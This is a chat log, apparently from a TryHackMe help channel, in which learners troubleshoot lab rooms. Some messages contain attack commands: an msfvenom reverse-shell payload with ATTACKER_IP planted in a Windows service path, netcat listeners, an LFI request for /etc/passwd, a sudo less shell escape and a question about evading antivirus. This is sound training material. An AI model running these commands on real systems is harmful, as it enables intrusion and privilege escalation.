#room-hints
it's supposed to end with sr-x
I'm following the directions exactly, but I'm not getting the final execute to show up when I look at the permissions
Working on Burp Suite Basics Task 13
I have the map, but I don't see the odd endpoint per the hint
(And apparently, I can't send a screenshot )
What am I doing wrong?
Okay, Take 2!
Working on Burp Suite Basics Task 13
I have the map, but I don't see the odd endpoint per the hint
What am I doing wrong?
I'll try again
nada "turning it all off and on again" 😛
I thought about doing that - I just wanted to do the room the way it seemed designed instead of finding my own loophole. But maybe that's what I'm supposed to do is just add x myself
By the way the task is written, it seems like just by following the instructions I should be able to land on the right permissions but maybe I'm being too strict on following step by step
Since I'm learning and pretty new, just want to make sure I'm learning as I'm supposed to and not taking short cuts
I could also just 777 it probably?
Hi all,
I am struggling to catch my shell on the Linux PrivEsc room (Crontab section) as part of the Jr. pen tester path. Would somebody be willing to take a look at my cronjob and maybe let me know if everything looks good? I can't seem to see the issue
I've tried with kali and the attackbox (i usually use kali), i've also tried a few different ports
That will overwrite the perms. Appending a permission will be better
So what you have done yet?
Hi, turns out i hadn't adjusted permissions!
Yep its the only thing missing
thanks for the offer to help anyway 🙂
Gave +1 Rep to @cold eagle
Download the bash executable to your Downloads directory. Then use "cp ~/Downloads/bash ." to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using "sudo chown root bash ..... (((((( i am stuck here, first how to download the bash file in the attack box ... no internet access
.. its getting more tough
I posted my question in another channel but no answers. So I try here 🙂
I'm doing the Metasploit: Exploitation room. I don't understand why at the task 6 I can't have a meterpreter session :
Type sessions?
Can you link the room please?
I switch off the attack box and I tried with the kali linux machine but the same issue
The Kali Linux machine is outdated.
So what I've to do ? Retry with the attackbox ?
Link me the room plz.
What's your target IP?
It was 10.10.161.70
yes it is
I switched off all the machines. I am retrying with the attackbox. I'll let you know
😫 still doesn't work
where is the problem ???
it's the same @silk turtle
😅 my bad. indeed it works ! Thank you
figured it out. thanks
Gave +1 Rep to @burnt rivet
Hi,
can anybody explain to me the difference between
sudo -u someuser python3 /path/to/script
--> the user is not taken into account
sudo -u someuser python3.6 /path/to/script
--> it works
doing the wonderland chall, and do not understand the difference.
I thought that python3 just points to the last python3 installed version
alice@wonderland:~$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6*
forget my question, it is a sudo command restriction
Network Services 2, Task 9. I try to run this command: mysql -h [IP] -u [username] -p
but it says I don't have mysql installed
I try sudo apt install default-mysql-client
and I'm getting an error about a malformed entry
Nevermind. I was able to complete the room without needing to deal with this
Once an attackbox is launched and it generates an IP address, is the IP address the client target machine ?
attackbox is your box
@trim badger But I have no target information but let me dig further into Anthem.
the target is the green "start machine" button. Some questions don't require it.
the ones that have that button are your targets
and when they're started, it will give you the targets IP up top
Thank you @trim badger looks like I was scanning my machine then 🤣
Gave +1 Rep to @trim badger
what does a directory listing flag mean in acme IT support?
ive been struggling on this hard
Find the dir that will give you flag.
thanks got it
Gave +1 Rep to @cold eagle
hi i need help for nmap task room 14 on practice. I did an Xmas scan on the first 999, except after that I didn't quite understand this question. I have to use the -vv switch but to find what exactly ?
yes and there are 999 open/filtered but this command gives two answers except that I can't find the second because I don't understand the question
the target responded with an ICMP unreachable packet. ?
but not open? ?
when there is a response from an open/filtered port that means the port is open but possibly there is a firewall?
but how does that answer the question should I use -vv ?
I have to use -vv?
but I don't understand the response format on the check
firewall ?
yes if the port is open there is no response like UDP but here I got the open/filtered
ok "no response"
so even if it is marked open/filtered it is not sure that it is open ?
it's good the answer is no response
"Locate the process that is running on the deployed instance (10.10.245.53). What flag is given?" on linux fundamentals part 3. I see a file whose user is "message+", so I'm assuming that is what I'm supposed to look at. I'm not sure what to do from here, though. If I try reading the file I get a bunch of gibberish.
nevermind I'm stupid there was a flag right under it lol
hello, i have been working away on the room "kubernetes for everyone". the last task i have for it is Task 3. has anyone here done this room?
that kubernetes room is broken, check the room's help archive in #release-help-archives to see possible fixes, one is to download the container locally and solve it there
Guys
I am doing the burpsuite repeater room
in task 8
I stopped understanding everything beyond the point with the 500 Internal Server Error
Could someone please explain to me what's going on?
Guys i need little help in this room
https://tryhackme.com/room/xss
Of task 3 stored xss
2nd last question stealing jacks cookies
How can i grab cookie?
Guys, i just did the "Year of the Rabbit" room and get "bonus points" (+50 for user flag/+150 for root flag). What kind of room give this points? Is that a thing in thm or just for that specific room?
Some rooms have them, it's just extra points on top to the points they give.
Got it. Was wondering if maybe its a specific kind of room or module. I'll try the other 2 from the Alice series now. Thks.
Wonderland and Looking Glass?
Y
Those are good rooms, done by James.
hi randomguy, thanks so much for the pointer on that.. i was starting to go crazy. this is the last question i need to solve for this room... i did actually do just that- i downloaded the container to my attack box and looked at the file system but no flags.. (i guess the jokes on me?!) 🙂
Gave +1 Rep to @vagrant comet
ah, found it! (the funny? thing is i have seen that before but just didn't look close enough). that is the lesson for me on this room (pay attention!). Cheers
Nice, well done 🥳
thank you, it always feels good to root a box. 🙂
Gave +1 Rep to @vagrant comet
yop, doing looking glass room
i'm trying to automate the ssh game with python.
i use socket to connect but i only get the banner : 'SSH-2.0-dropbear\r\n'
how can i go one step further with socket to get the message ?
I thought about using paramiko but it requires a password and i got only failed auth message
Paramiko doesn't work but paramiko-ng should
Small hint request for Network Services room Task 9... nudge me in the right direction for figuring out what variant of FTP is running on it. Nmap just says ftp and there seems to be nothing in the room that teaches you how to enumerate this info...
Stage: FTP Enumeration
What I've tried so far: only nmap scan, no idea what tool/technique I should use to figure out what variant of FTP is running
ok, no
I was resisting the temptation to source outside material as I figured I was missing a step or some key information provided in the room
alright
+rep @burnt rivet
Gave +1 Rep to @burnt rivet
i implemented divide and conquer algo with subprocess (not the best way but it works)
Binary search? That's what was intended, I'm really glad someone actually did it that way.
thanks i got it now
Hey can someone help me in windows privilege escalation room from privilege escalation module
I am not able to RDP into the windows machine
think I did something similar
took like 5 or so steps
and apparently I was insane and did it in rust
❤️ I am proud of you
wait how many people brute forced that thing?
oh I never did a writeup for looking glass
Never too late!
i am solving now lazy admin but i am unable to edit through nano please guide me on this .
You need a stable shell with a terminal to use nano
But that looks like a permission denied error, try using vim or vi
Also, try export TERM=xterm iirc that's how you specify a terminal
Hey guys I'm working on incident handling with splunk. I'm stuck on the installation phase where the question asks, "Search hash on the virustotal. What other name is associated with this file 3791.exe?". I simply can't figure out the answer. Please help me if you can!
have you done what it asked?

thank you so much! had no idea it was a site 😫
Much appreciated
Gave +1 Rep to @ripe hedge
cheers
hey guys so I'm trying to get the flag for one of the linux rooms after setting up the http python server but I keep getting a 404 error
I copied and paste it and used the wget command like it said
is there a problem with the linux room or am i just not doing it right lo
What’s the wget command and ur ip
@
@deep brook uh lol the wget followed by the link I'm trynna download files in order to get the flag using a python http server
What ip is in the command
yes that is why its not downloading right
request sent, awaiting response... 404 File not found
2022-06-25 00:22:21 ERROR 404: File not found.
the name is .flag.txt
And is the file on a server
yeah it should be lol
wget http:// target ip /flag.txt
yeah I know but on the task it gives me my ip lol
that is the target ip
like my machine ip is the same as the target ip
Yes and it’s not giving you the file
What ip does it show at the top of the webpage with a green oval
uh you mean my attackbox ip?
I am on a vm lol
Could it be the . Before flag
in the home directory
oh so no. lemme try that
it tells me to start the webserver in the home directory though>
?
@burnt rivet
Try wget without the . Before flag jic
Yeah I am aware of that thank you
HTTP request sent, awaiting response... 404 File not found
2022-06-25 00:34:47 ERROR 404: File not found.
@burnt rivet
oh
?
so set up the server on tryhackme then
got it
@burnt rivet oh I guess I was confused about that thanks for the help and clarification
Gave +1 Rep to @burnt rivet
@deep brook thanks to you as well
Gave +1 Rep to @deep brook
Np
Just curious, is there a precursor for Aircrack suite rather than Wifi Hacking 101 on THM? Or do I learn about those elsewhere then start
Can anyone tell me how long the bruteforce attack on the FTP Server in Task 10 of Network Services should take?
Disregard. Worked out what I was doing wrong.
Bruteforce attacks in labs should take between 1-5 min if that does not work know that maybe there is a problem.
owasp Juice shop is the only exception to this.
The docs and man pages for it.
Kk, ty
Gave +1 Rep to @stuck fractal
Am in sql injection task 5 and when i hit the machine to start it all work good but the given link is not valid... it says that it took too long time
any advice guys
I completed PreSec and now I'm just going through web fundamentals trying to learn web
I found a login page on /wp-admin in Tech_Spport:1 what should I do now. I'm pretty stuck
I ran wpscan and found support
Look at ||smbclient||
Heya! I'm on the network services room, task 7 => exploiting telnet and i have an issue while running nc -lvp 4444 on my computer, i systematically get a nc: getnameinfo: Temporary failure in name resolution, yet vpn is connected, i can ping 10.10.10.10 successfully and i'm connected on the telnet on the remote server, no firewall on my side and can't figure out what i'm missing out here
payload generated correctly from msfvenom
NVM : bad conf on resolv.conf
Try using nc -lvnp 4444, stops resolving DNS :)
Let me know if that works, just a guess.
oh i already fixed the issue ^^ but thanks anyway :p
ah no issues, have a nice day :)
this was the issue
yup and now it's lights out, 6hours of tryhackme after 8hours of coding today it's a bit much hahaha
yeah take a break, sounds like something id do
Yo
yoo
yo
Stuck at 'One Piece Room' Task2-Q6. Specially the encoding part need help!!
Hi all, Regarding Anthem CTF flags 1 and 2. I have discovered 2 flags but they are not recognised. Can I get some hints pleeease ? Thanks.
Can you give the link, I can't find it when searching
Which 2?
Either DM them to me, or post with spoilers.
Thank you @lucid junco
Gave +1 Rep to @lucid junco
Hi! I'm doing my first attempt of the Easy Peasy CTF Room. In the introduction to gobuster room I had to manually add the site I wanted to search through to /etc/hosts using: echo "MACHINE_IP webenum.thm" >> /etc/hosts before gobuster was able to make a connection
Now that I have only been provided an IP address (and no domain name), how can I find the domain I have to add to /etc/hosts to be able to use gobuster for searching the flags?
You don't necessarily have to add a host name for every room, just use the IP in that case
Okay, but when I try to use gobuster dir -u http://10.10.240.204 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt I get an error
Error: error on running goubster: unable to connect to http://10.10.240.204/: Get http://10.10.240.204/: dial tcp 10.10.240.204:80: connect: no route to host
Are you on your own machine or the attackbox?
Attackbox
You sure you are using the correct IP of the target machine ?
Mh, so if you are sure you got the IP out of the "Active machine information" box that's looking like that:
That's right!
Then I suggest to refresh the room page, maybe the machine expired, the timer sometimes is a little bit buggy
Or simply try to terminate the target machine and start a new one
Okay! Will try that!
Gobuster does not always need the target IP and domain to be placed into /etc/hosts as in the tutorial?
No
That did the trick, thanks!
Gave +1 Rep to @left thunder
Hi,
doing blue room. Almost new to metasploit... trying to exploit the ms17...
i configured RHOSTS and payload but when i run the exploit i get the following message
[*] Exploit completed, but no session was created.
did i miss anything ?
[+] 10.10.151.50:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.151.50:445 - Sending egg to corrupted connection.
[*] 10.10.151.50:445 - Triggering free of corrupted buffer.
[-] 10.10.151.50:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.151.50:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.151.50:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Have you set Lhost to tun0?
you are right... it is pointing to my eth interface (also in 10.x.x.x and i did not see it)

error message was not clear and i begin with msf !
thank you !
Gave +1 Rep to @lucid junco
finally installed a VM , now im connected. got a flag, but where do i post this flag, any hints? Tried searching for entry level rooms.
tnx, gonna check it out
it was there.
im doing https://tryhackme.com/room/windowsprivesc20 task 5 and im trying to set up a shell to get the flag for svcusr2's desktop.
im in the Unquoted Service Paths section.
i did icacls c:\MyPrograms in the windows machine
then i sent the payload msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe
then opened up netcat via nc -lvp 4446
i then spun up a http server using python3 -m http.server in a separate terminal from the attackbox
i then went to the windows machine to powershell and did
wget http://10.10.96.110:8000/rev-svc2.exe -O rev-svc2.exe to get the file off the attackbox
i then moved the file to the right spot via powershell in the win machine using
PS C:\Users\thm-unpriv> move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
and i assigned the proper permissions using
PS C:\Users\thm-unpriv> icacls C:\MyPrograms\Disk.exe /grant Everyone:F
i then tried in both powershell and cmd
PS C:> sc stop "disk sorter enterprise"
sc : Access to the path 'C:\stop' is denied.
At line:1 char:1
- sc stop "disk sorter enterprise"
-
+ CategoryInfo : PermissionDenied: (C:\stop:String) [Set-Content], UnauthorizedAccessException + FullyQualifiedErrorId : GetContentWriterUnauthorizedAccessError,Microsoft.PowerShell.Commands.SetContentCommand
PS C:> sc start "disk sorter enterprise"
sc : Access to the path 'C:\start' is denied.
At line:1 char:1
- sc start "disk sorter enterprise"
-
+ CategoryInfo : PermissionDenied: (C:\start:String) [Set-Content], UnauthorizedAccessException + FullyQualifiedErrorId : GetContentWriterUnauthorizedAccessError,Microsoft.PowerShell.Commands.SetContentCommand
but the service doesnt exist and wont start
also i cant seem to get the shell either. at what point did i do something wrong to exploit this service and get the shell. why am i getting this error?
You’re doing it in powershell, exit the powershell shell and do it in cmd 🙂
I think?
Set-Content]
Powershell doesn’t recognize sc iirc
it does
but
sc is short for Set-Content when in powershell
Ahhhh yes
You need to do sc.exe
I believe this is explicitly noted in some of the content
@pallid moss Do you remember what room you set the added hint with sc for?
I just remember I exited the powershell shell and did same command in cmd, and it worked fine for me
i tried in both powershell and cmd but neither worked
ill have to do sc.exe
i restarted the box so im replicating the steps up until that point
finally got the shell!!!!!!!!
Nice!
I can't find it at the moment...
Wait, found it, #general message
So it's https://tryhackme.com/room/winprivesc Task 2 at the very least.
It's set as a reminder in Task 6 just before the questions too
I think it needs to go onto the new one as well, not sure who made it
Gotcha, I'll get that added. I QA'd that too, so not sure now i missed that 
It's not an issue if you do the room properly, the Terminal boxes on the site are even titled "Command Prompt"
But people change things. Yup, makes sense.
Oh... It is in there at least in task 5, it was in my testing notes
I couldn't see it but I spent about 30s looking
Cc @potent stirrup instructions are in there for PowerShell
It's in there when you (should) first switch from powershell back to command prompt and do something with sc. I'll add a reminder
It's in there twice now, so hopefully that'll be enough 🙂
Hey so im on the manual discovery favicon part of the content discovery room, the hash that I get by entering the command is not the hash the answer wants is the database outdated?
The specific room is Jr Penetration Tester - Content Discovery - Manual Discovery Favicon
Hi does anyone have some clues on what is the || ariadne binary file located in /home/ariadne|| in the theseus room ?
strings not giving you any useful output???
nope, not that i can see, it was my first try
i look at it with binwalk too, nothing
Any hints on lateralmovementpivoting room - task 5? Did everything up to the winrs command. Got the shell with pass the hash but when the winrs.exe command is run to get a cmd on THMIIS it says:
winrs error: The user name or password is incorrect.
@burnt rivet it doesn't give me 404 the command gives me the hash I need to check against the database, when I check that specific hash against the database the framework I got from that does not match the amount of letters the answer is looking for, the answer is one word 6 letters the hash matched to a company with two words
@burnt rivet I will try that tonight after work, thank you
Gave +1 Rep to @burnt rivet
pickle rick
i've gotten into the login page and have logged in, i've put together that the command thing is like a mini linux terminal. but i cannot cat files around to view them so i assume there needs privilege escalation i was wondering if anyone could link or talk about some of the resources needed for it? i've been working through this for 2 or 3 days now slowly bumping into things like a bee in a flower patch
there's other commands for reading file content than cat, some examples are less, more,head,or just straight up start echoing the file with
while read line;do echo $line;done < file.txt
what language is that in? or is that linux terminal? because i've never heard of a line like that before and don't fully understand how to digest it other than
while reading the line in this case ||Sup3rS3cretPickl3Ingred.txt|| ; [meaning new syntax just same line] do echo so that when it's reading it echos ||Sup3rS3cretPickl3Ingred||.txt i don't understand $ line being like a variable of the designated ||Sup3rS3cretPickl3Ingred||.txt;done to close it off and <||Sup3rS3cretPickl3Ingred.txt|| is the assigned value of line
is that kinda how its read?
that's bash and yes, it's "terminal linux" as you call it
the command is working as follows:
while keep reading the line;do echo the line you've read;and then stop when you're done (take the file content with the redirect <) and filename is this file.txt
okay bash is the proper term sweet cuz i def gotta brush up on it im just at the part when i can barely comfortably maneuver around the terminal
yes, bash scripting is very powerful and quick for simple tasks once you get the hang of it
yeah so far i love how quick bash is even at half power of my computer, and the depth of its usability
im on javapoint rn n i see the while read line;do etc.... theres a lot here
hello im new and trying to figure these questions out. im doing the wireless can i ask a question
Sure, but it'll be easier if you're verified and can send screenshots
!docs verify
Now you can just ask the questions and if needed add pictures
thank you I'm going to try and research more first lol i think i understand the need to develop good fact finding skills first lol ,,,, but thank you so much!!!@earnest charm
In the Burp suite repeater room, task 6. I added a header called FlagAuthorised and set it to have a value of True, as shown in the screenshot, then pressed "send", but I don't see any flag in the response.
Haven’t done the room, but I would try removing the colon after True
I'd suggest asking in #lateral-movement-and-pivoting if you haven't already 🙂
i checked and its working
i think the headers are different, please check if you are running the correct machine attached to the task
Thanks, that helped.
Gave +1 Rep to @lyric lichen
hello guys
im on xss room
dont know why i cant get the answer from the server
im specifying the port correctly?
ooo
didnt know that...
and why with the attack box works?
luuul
how did you discover that
XD
yeah, just that
didnt know why didnt work
but if they already know
dont need to say nothing i guess
okay
perfect then
!docs
Visit the help site
Learn how to sync your THM profile to Discord
Learn about our student discount programme
View all the TryHackMe levels & point requirements
Get started with making TryHackMe room
Learn about the TryHackMe room review process
Read about the TryHackMe API
How to play TryHackMe's King of the Hill (KoTH)
What rooms should you do? A free guide for beginners
Learn about TryHackMe's Bug Bounty Programme!
I'm in Anthem right now. I really want to gain control using a method not described in the question's section [outside the scope]. I need sanity, badly.
I'm trying to run RCE. Uploading a powershell script set to run when invoked. Antivirus is blocking it. Here's a screenshot:
I need to know, can I encode this somehow? Would that even bypass AV or am I just beating my head against the wall?
I just didn't know what I was looking for. I didn't grow up doing this....
but thanks for the pointer
Island Orchestration. sorry for my mistake
Besides Clock and Network, what other icon is visible in the Notification Area?
Any help
Again, what room are you looking for assistance with?
Sounds like you're quoting a specific question
It's Windows Fundamentals 1
yeah lol
So what's the issue exactly?
They resolved this in #general
hi people, doing RELEVANT and i cannot enter smb without password when on the video shows it doesnt need.. any suggestion??
❯ smbclient //10.10.182.73/nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)
❯ smbclient \10.10.182.73\nt4wrksv
Password for [WORKGROUP\root]:
do_connect: Connection to 10.10.182.73 failed (Error NT_STATUS_IO_TIMEOUT)
looks like your machine run out
yeah... but everything works fine and the time machine is ok
what is the room name?
RELEVANT
Is it okay if I ask a question about a THM question here?
Hi guys, i'm kinda stuck on file inclusion room task4 question 2. I'm seeing the error page but i don't understand what exactly is expected as answer, i have tried a lot of directories that i see in the error message, all without success. Can someone push me in the right direction?
i have tried /lib/php , /var/www, /usr/lib but nothing seems to work
nvm, it was right on my face
Get the point
Add after the Php the needed arguments
Xxxx/lab.php?file=/etc/passwd
!docs levels
!docs api
Hello guys, I'm on the Buffer Overflows room (/room/bof1) and I'm stuck on the exercise where I'm supposed to overwrite a function pointer. I understand that I need to fill the buffer and then write the address of the function. I looked for the function address with radare2, I then wrote it after the end of the buffer in a Little Endian format but I just get a segmentation fault 😦
Do you have access to the binary on local or have to perform a blind attack on remote?
I have full access to the binary
I'd say the first step is to check the buffer's size. Then, find the overflowing function (e.g. gets in C), then overflow that function and check what is actually getting overflowed.
For example there's a difference between overwriting the actual instruction pointer and changing the RET address the pointer points to. These look different in the registers if you look at them.
Binary exploitation is very contextual, so it's hard to help without knowing the details.
This is indeed a gets overflowing function. I know that I need at least 15 char to overflow it so I put 14 chars and then the begin address of the function I want to go to
the C code :
What's the goal of this challenge? To execute special() from the overflow?
yes, it normally goes to the "normal" function and we need to go to the "special" function
You should check the registers after your buffer overflow.
In gdb you can do this with a simple info registers
ok I'll try that to see what's happening
Thanks !
For this scenario you'd want the RIP (64 bits) or EIP (32 bits) to have the value of your overflow.
Ok I found my problem, in fact I was doing right (kinda) but in the hex address there is a "05" which corresponds to the ENQUIRY character in ASCII
I don't know how to write the ENQ char...
print(padding*offset+hex)
python will print the \x05 as the correct value
You can pipe that into the binary
Ctrl+E works ^
I'd just write a simple script with pwnlib.
Instead of trying to press the correct characters for the ASCII haha
Done :
good idea ^^
Thanks for the help !
thanks !!
Gave +1 Rep to @zealous frost
If you need anymore help in the future, don't hesitate to ask! When I have time I always like to help out others!
Ok nice, will do !


Hello, how do you get the pentester rank?
So today it is no longer possible?
Ok, thanks for the help.
Hi All, After a hint for the Sakura room if anyone can help.
I am on the part where i need to go to the darkweb and find the SSID and password. I have only been on the darkweb a few times and not 100% sure on how i would search for this on there?
would i just add .onion to the end of the string i find on twitter?
I think so, iirc they gave the solution in a hint for people who didn't feel comfortable going to the dark web
https://tryhackme.com/room/wiresharkthebasics In task 2.3 Something wrong this hash sha256. The hash from info not works. Anyone can help me with this task?
wait a minute, is this a new room or an older one, cuz I think I've done this but the tasks are unanswered
ooh just got released, nice
cat file.pcap | sha256sum should work tho
I have one left
not works bro
try uploading the file to cyberchef if you can and use the sha256 recipe
have you done this room?
nope
i think this task is broken
¯\_(ツ)_/¯
omg
Try this room and let me know if you done task2
I was about to ask about this room
What hash are you trying? (use spoilers or DM me)
check your dm
I DMed too
Copied the sha256 in the wireshark's capture properties and tried sha256sum in the terminal. Both gave the same value and the answer is wrong
i kinda decoded it. but. ? what is that??
And @inner flower I've posted in Site bugs.
So, next time we can just mention it there directly?
Thank you
credit to OG poster on forum room: just remove the last char of the digest. Turns out it's a copypasta problem.
Staff have also fixed the issue.
hi
anyone on?
I need help with the LFI challenge?
I tried changing request to POST request and I am wondering why it won't work?
the problem is I can't figure out what to do next. I go into web developer console and change it to POST, then I try posting something but it won't get me anything
I tried using file parameter
wait I figured it out
never mind
it was challenge 1
I am doing challenge 2
this stuff gets harder as you go along
fun challenges
how am I supposed to solve this if an input box won't appear?
I can change the cookie to admin and that appears to be one step but I keep trying to specify file in URL
and it won't help
right but I am trying to do it in URL and that isn't working
is it something I can type in URL?
inspect element?
ok
do I need burp suite?
No
ok
if I already did the HTTP web basics pathway twice do you recommend redoing it for this challenge?
Not sure if it would help.
You have to play around a bit with the stuff you have already available and caused already changes on the page.
Well, it's a challenge.
But it's not that complicated, so don't overthink it.
Once you see how the site behaves on certain changes, it should get clear 🙂
oh yeah that thingy
Trying to download .flag.txt but just getting HTTP request sent, awaiting response... and nothing happens
send a screenshot
Thank you @pastel turret I was running the WGET from the wrong device. Now that its downloaded, where does it store the file ? Under what folder
Gave +1 Rep to @pastel turret
under a folder you run a command, should be /home/your username
or you can use a command find
@pastel turret wget http://10.10.55.255:8000/.flag.txt
--2022-07-06 03:46:59-- http://10.10.55.255:8000/.flag.txt
Connecting to 10.10.55.255:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20 [text/plain]
Saving to: ‘.flag.txt’
.flag.txt 100%[===================>] 20 --.-KB/s in 0.001s
2022-07-06 03:46:59 (34.2 KB/s) - ‘.flag.txt’ saved [20/20]
tried to use the find cmd
Thanks a lot, i realized my mistake.
Gave +1 Rep to @pastel turret
i am creating an output with > and i dont see anything there
Are you giving it a name after the > ?
Shouldn't it be a .txt file not folder ?
From the screenshot I saw before, it looked like you didn't even start the target machine yet
Yep, do you see how it says "MACHINE_IP" ?
https://tryhackme.com/room/windowsprivesc20 I was unable to complete task4; my target machine is unable to connect a reverse shell onto my attackbox. Help i can't fix it by days
guys im clueless kinda on how to use the ?key parameter on 8080 of a machine to do remote fileinclusion in order to open a reverse shell.
Host a server on your machine using python and paste the link of your IP with reverseshell.php
hi i have a question
why im isnt room with that
@white salmon sry if i talk here
but i dont understand "command mode"
i just did sudo less /etc/profile
then did !bin/bash
@novel pike
sudo less $FILE
SHIFT+: <--- press this on keyboard.
!/bin/bash <---- type this command
ENTER <--- press this on keyboard
Its not what i did ?
It's not.
Ah you want that i write $FILE ?
Ideally, I'd like you to take a step back. Review the basics, then read the instructions I've provided.
It'll click eventually 🙂
Ok ty which basics Can i review to progress ?
Gave +1 Rep to @zealous frost
https://linuxjourney.com/ complete every lesson in this website!
It will teach you all the basics you need for working with linux distro.
Linux is one of the major operating systems and is heavily used in organisations all around the world. Learning how to use Linux is a core competency and will help you in your hacking journey not to just use Linux-based security tools, but how to use and exploit the operating system. This module will focus on getting you comfortable using Linux.
You can do this room too.
Ok i will go to your link, but what was wrong with what i wrote ?
You'll find out later, don't worry.
Ok ok i will read linux fundamental ty
I don't receive a CanRestart option after I run Invoke-AllChecks on Task 3 in the Steel Mountain room. Has anyone come across this issue as well?
@white salmon i literally read all the 3 headings and i dont know where do you want me to check
give me chapters or anything please
I gave you enough information to solve your problems, but I can't solve them for you, or rather, I won't.
it says /etc/flag2 not available on the server in LFI challenge 2
could someone give me a hint without giving me the answer
I checked the cookies and got admin success page to show up
I am trying to figure out how to send input to the server
don't want a spoiler
If you provide information, I'll point you in the right direction.
so I'm trying to figure out challenge 2, at the end of the LFI room
and
I checked my cookies and figured out how to modify the cookie
so now I'm playing with modifying cookies to get maybe an input box
I don't know by heart every room on THM. You need to share a few screenshots and details on what you want to achieve.
I got the success message to show up by switching cookie to admin
ok
hold on
I got to that section
I modified the cookie from guest to admin and managed to get the success page to show up
however, that's about as far as I have been able to get
I have been playing with the stored cookies because the challenge wants me to access the /etc/flag2 file
and there's no input box
so I have to figure out how to send input without box
and URL isn't doing it
on its own at least
This room is based on local file inclusion. How familiar are you with LFI/RFI?
I just completed the LFI and RFI room
or most of it
except this challenge and the ones after it
yesterday I completed it
and I did challenge 1
so now doing challenge 2
How did you solve the first challenge?
I just need a hint in the right direction. I don't want to be given answer.
I had to modify a GET request to make it a post request and then post to a file and in the error message I got the flag (I think so, but I may be remembering wrong)
something like that
took me a while to figure out
I'd recommend to test the broader surface, rather than straight diving into that cookie.
Consider this:
Why did you instantly focus on cookie? What steps you took to identify it as a vulnerability? What made you think you could chain it into an attack vector?
well I tried modifying the URL using $00 and other things as well like // etc
hello!, rn i am doing the blue room and i cant get the exploit to work. i tried to reset the machine and wait at least 5 min before redoing the exploit and changing the lport in case of a port not closing down. any suggestions?
it always fails at Triggering free of corrupted buffer.
I looked at the hint and it said to check cookies
and from there the success page showed up but no input box or flag
I don't think I need Burp for this tho
so I'm confused as to where to look?
Is the exploit eternal blue ?
If you believe the cookie is vulnerable, then attempt to include the file you want from machine.
I did this today several times and it didn't work
Try to think of where the /etc/ directory is located on the linux hierarchy, then think where application folder is usually located at.
Traverse from application folder to the /etc/ folder.
ok thanks
Check which type of PHP application it is.
Older versions vulnerable to null bytes.
ok thanks
That's all you need.
ok thanks
Ensure you put the correct options in metasploit if you are using that.
Awkward moment
Ok I will keep going thanks
does JavaScript console have any relevance?
or should I just keep looking at the cookies?
ok
thanks
I keep modifying the path of the cookie
and it doesn't do anything except give me errors. is it just in cookie modification path? when I switched the value to Admin that gave a positive result
hold on
I switched it to post
so I mean hold on a second
ok I keep trying to change the file path and it doesn't work
ok
"Fucked it up" 😄
so I found that %00 gets written as blank when pasted in the value section
That's a null byte. It can help indicate the end of code execution or array or etc.
It affects some older versions of PHP.
is that closer?
like am reading through room materials second time in a row and looked back on earlier page
or should I just reread it start to finish?
Ok thanks
hi, do you think I should do the How the Web Works Series again?
I'm thinking of doing that so I can solve this current room on LFI
maybe then I could start the LFI room again
would that be an ideal way to go?
i dont think so, the material should be enough.. lemme pop it open, did it couple days ago
are you doing the Web Fundamentals path tho?
@mighty estuary you can complete that question with the content available in the room, i'd say don't over think it.. go back to the basics/the start (even if that means clearing the cookies)
hello, I'm on task 4 of the Networking Services Room. I'm having trouble with the last two questions
the only hint is "What is the default name of an SSH identity file?". I've looked it up so I know the answer but dont understand how to derive it from the information in the exercise. Since i need to download this id_rsa file which I havent actually found to complete the task, im kinda stuck
ive tried reading the contents of all files in this shared folder but I must be missing something
Did you look inside the subfolders as well ?
Hiya! I'm on question 3 of Linux fundamentals part 3. I launched python3 -m http.server and the next link pops up in the terminal, but nothing happens after that and it doesn't start another tryhackme command line so I can't type in the wget command to get the flag. Am I doing something wrong? :/
line*
Gotcha! Thanks!
I thought I had verified before I asked my question in here, but I will double check to confirm. Thanks!
so where am i able to find the email password combo
these are the names i was able to scrape previously
what do u mean
👀
If it has all that other shit in it,
never heard a better explanation imo
hi I'm redoing LFI room and I'm having trouble with Lab 6
I get to the point where I am including the THM-profile directory and I am trying to get outside of that directory using /.../../.. or ..//..//..//..
and trying to get to the file I'm trying to read in /etc/ folder
but it won't work
could someone give me a hint
thanks
please don't give me the answer tho
I tried without double dotdotslashes but ya ok
ok thanks solved it
hi guys. with the subdomain enumeration room, I'm struggling to find the two subdomains. I'm using acmeitsupport.thm in the url flag, but it doesn't give me anything.
Can we see your command?
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://acmeitsupport.thm -fs 472
I havent used this namelist.txt before but i used subdomains.....-5000.txt and it worked for me
The only reason I'm using that namelist is that's the one that they tell me to use in the exercise. I'll try the subdomains one. Thanks
Gave +1 Rep to @cold eagle
And i believe that you have added the IP and domain name in your hosts file
You have added? @jade island
My apologies. I hadn't started the machine 🤭
I actually started with this task yesterday, and didn't realise that I left the machine running, so it obviously terminated. forgive me
thank you for the help.
It's probably best you don't spam multiple channels.
Hey all, I've come across an issue during my engagement on Relevant. Two of the SMB shares (IPC$ and nt4wrksv) are open so that doesn't require credentials to access.
According to many walkthroughs (I hated checking them out cuz I wanted to do it all by myself) Machine is supposed to be vulnerable to MS17-010 (Eternal Blue), which I confirmed from the Nmap vuln scanning but doesn't seem to be working when tested out with various exploits found online such as AutoBlue, zzz_exploit.py, etc. They all kinda led to ACCESS DENIED. I tried to open up the exploit and see what's going on but no luck..
Can someone tell me what's going on? Let me know if you need some more info
can you anyone give the hint of Pickle Rick room
I have done ports scan and directory listing
I've had this exact same issue
